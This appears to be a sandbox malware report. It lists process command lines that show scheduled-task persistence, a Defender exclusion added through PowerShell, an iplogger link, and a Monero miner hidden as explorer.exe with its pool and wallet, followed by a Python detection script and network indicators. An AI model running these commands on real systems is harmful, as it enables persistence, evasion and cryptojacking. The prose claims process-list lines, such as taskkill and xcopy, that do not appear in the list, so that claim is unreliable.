"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2288,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2496 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3424,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3548,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3788 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3860,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3972,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5036,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4408 -s 740
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3984,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3496 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4156,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4652,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3476,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3528 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=4132,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3960 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3236,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4268 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=4200,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.cmd" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4eaa46f8,0x7ffc4eaa4708,0x7ffc4eaa4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1968 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
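The process list above shows the whole chain in plain command lines: Chrome is killed so its profile databases are unlocked, the profile is xcopied to a Temp directory, a second Chrome is started off-screen (`--window-position=-50000,-50000`) on the copied profile against the Facebook billing pages, an on-logon scheduled task at highest run level is created for an executable under AppData\Roaming, a Defender exclusion is added by PowerShell, and a process named explorer.exe carries XMRig-style RandomX and nanopool arguments. The Python below is an added example, not part of the sandbox report or of any tool it names: it runs simple detection rules over those command lines and pulls out the host-level indicators. The sample lines are copied from the report's process list (the miner wallet is shortened), the final Chrome renderer line is a constructed benign control, and the rule names, the `SYSTEM_IMAGES` set and the regexes are my own.

```python
"""Triage sandbox process command lines for the browser-profile theft,
persistence, defence-evasion and mining patterns seen in the report."""
import re

# Copied from the report's process list (wallet address shortened), plus one
# constructed benign Chrome renderer line as a negative control.
SAMPLE_CMDLINES = [
    r'cmd.exe /c taskkill /f /im chrome.exe',
    r'xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://secure.facebook.com/ads/manager/account_settings/account_billing/',
    r'''schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' '''.strip(),
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"',
    r'C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --randomx-mode=auto --url=xmr-eu2.nanopool.org:14433 --user=WALLET.main/password --pass= --tls --cinit-stealth',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --renderer-client-id=6',
]

# Assumed set of Windows binaries that should never carry miner arguments.
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe", "conhost.exe", "dllhost.exe", "sihost.exe"}

IMAGE_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')            # first token, quoted or bare
POOL_RE = re.compile(r"--url=([\w.\-]+:\d+)", re.I)           # xmrig-style pool host:port
TASK_TARGET_RE = re.compile(r"""/tr\s+['"]*([A-Za-z]:\\[^'"]+?\.exe)""", re.I)
USER_DATA_DIR_RE = re.compile(r'--user-data-dir="?([^"\s]+)', re.I)


def image_name(cmd):
    """Basename of the launched image, lower-cased (e.g. 'chrome.exe')."""
    m = IMAGE_RE.match(cmd)
    path = m.group(1) or m.group(2)
    return path.rsplit("\\", 1)[-1].lower()


def extract_task_target(cmd):
    m = TASK_TARGET_RE.search(cmd)
    return m.group(1) if m else None


def classify(cmd):
    """Return the names of every rule the command line trips (empty = clean)."""
    low = cmd.lower()
    image = image_name(cmd)
    hits = []
    if "taskkill" in low and "/im chrome.exe" in low:
        hits.append("browser_killed")                 # unlocks Login Data / Cookies DBs
    if image in ("xcopy", "xcopy.exe") and "\\user data" in low and "\\temp\\" in low:
        hits.append("browser_profile_copied_to_temp")
    m = USER_DATA_DIR_RE.search(cmd)
    if image == "chrome.exe" and "--window-position=-" in low and m and "\\temp\\" in m.group(1).lower():
        hits.append("hidden_browser_on_copied_profile")   # rides the victim's live sessions
    if "schtasks" in low and "/create" in low and "/sc onlogon" in low and "/rl highest" in low:
        target = extract_task_target(cmd)
        if target and "\\appdata\\" in target.lower():
            hits.append("onlogon_task_highest_from_appdata")
    if "add-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion_added")
    if "--algo=" in low and "--url=" in low:
        hits.append("xmrig_style_mining_args")
        if image in SYSTEM_IMAGES:
            hits.append("miner_args_under_system_binary")  # injected or renamed miner
    return hits


def triage(cmdlines):
    """Map each command line to its rule hits; clean lines map to []."""
    return {cmd: classify(cmd) for cmd in cmdlines}


def indicators(cmdlines):
    """Host IOCs from flagged lines only: pool endpoint, task target, staged profile dir."""
    iocs = set()
    for cmd in cmdlines:
        if not classify(cmd):
            continue
        for rx in (POOL_RE, TASK_TARGET_RE, USER_DATA_DIR_RE):
            m = rx.search(cmd)
            if m:
                iocs.add(m.group(1))
    return iocs


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_CMDLINES).items():
        print(f"{image_name(cmd):16} {', '.join(hits) or '-'}")
    print("IOCs:", sorted(indicators(SAMPLE_CMDLINES)))
```

The rules deliberately key on argument shape rather than on file names, since the dropper names (`cghjgasaaz99`, `services64`) change per build while the sequence taskkill, xcopy of `User Data`, hidden `--user-data-dir` under Temp does not; the same applies to `--algo=rx/0` plus a `:14433` pool, which identifies the miner regardless of which system image name it hides behind.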
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 104.26.4.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 104.26.5.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 104.17.28.25:80 | www.maxmind.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| GB | 37.0.8.235:80 | | tcp |
| US | 8.8.8.8:53 | 15.4.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.5.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.28.17.104.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | prophefliloc.tumblr.com | udp |
| US | 74.114.154.18:443 | prophefliloc.tumblr.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| N/A | 127.0.0.1:55740 | | tcp |
| N/A | 127.0.0.1:55742 | | tcp |
| US | 8.8.8.8:53 | 239.2.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | secure.facebook.com | udp |
| GB | 157.240.214.13:443 | secure.facebook.com | tcp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| GB | 157.240.221.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | udp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | 11.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| SG | 37.0.11.8:80 | | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | | tcp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 51.210.150.92:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 8.8.8.8:53 | 92.150.210.51.in-addr.arpa | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 162.19.224.121:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.224.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
